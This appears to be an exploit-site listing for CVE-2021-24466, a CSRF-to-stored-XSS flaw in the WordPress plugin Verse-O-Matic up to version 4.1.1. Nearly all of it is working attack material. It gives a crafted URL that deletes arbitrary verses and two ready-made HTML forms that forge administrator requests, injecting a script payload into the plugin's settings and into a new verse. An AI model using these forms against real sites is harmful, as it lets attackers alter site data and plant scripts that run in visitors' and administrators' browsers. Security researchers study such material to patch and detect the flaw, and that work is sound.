Exploit for Verse-O-Matic <= 4.1.1 - CSRF to Stored XSS CVE-2021-24466

Name: Exploit for Verse-O-Matic <= 4.1.1 - CSRF to Stored XSS CVE-2021-24466
Rating: 5 (368 reviews)

2021-07-19 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:37C7BDBB-F27F-47D3-9886-69D2E83D7581
Delete arbitrary Verse: https://example.com/wp-admin/options-general.php?page=verse-o-matic.php&action=delete&vomID=1

Stored XSS via settings:
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=verse-o-matic.php" method="POST">
      <input type="hidden" name="vom_display" value="random" />
      <input type="hidden" name="vom_switch" value="true" />
      <input type="hidden" name="vom_staticID" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="vom_limit" value="true" />
      <input type="hidden" name="action" value="update_settings" />
      <input type="hidden" name="EditSettings" value="Edit Settings Â»" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


XSS via added verse:
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=verse-o-matic.php" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="vom_verseText" value="<script>alert(/XSS/)</script>" />
      <input type="hidden" name="vom_visible" value="yes" />
      <input type="hidden" name="save" value="Add Verse Â»" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>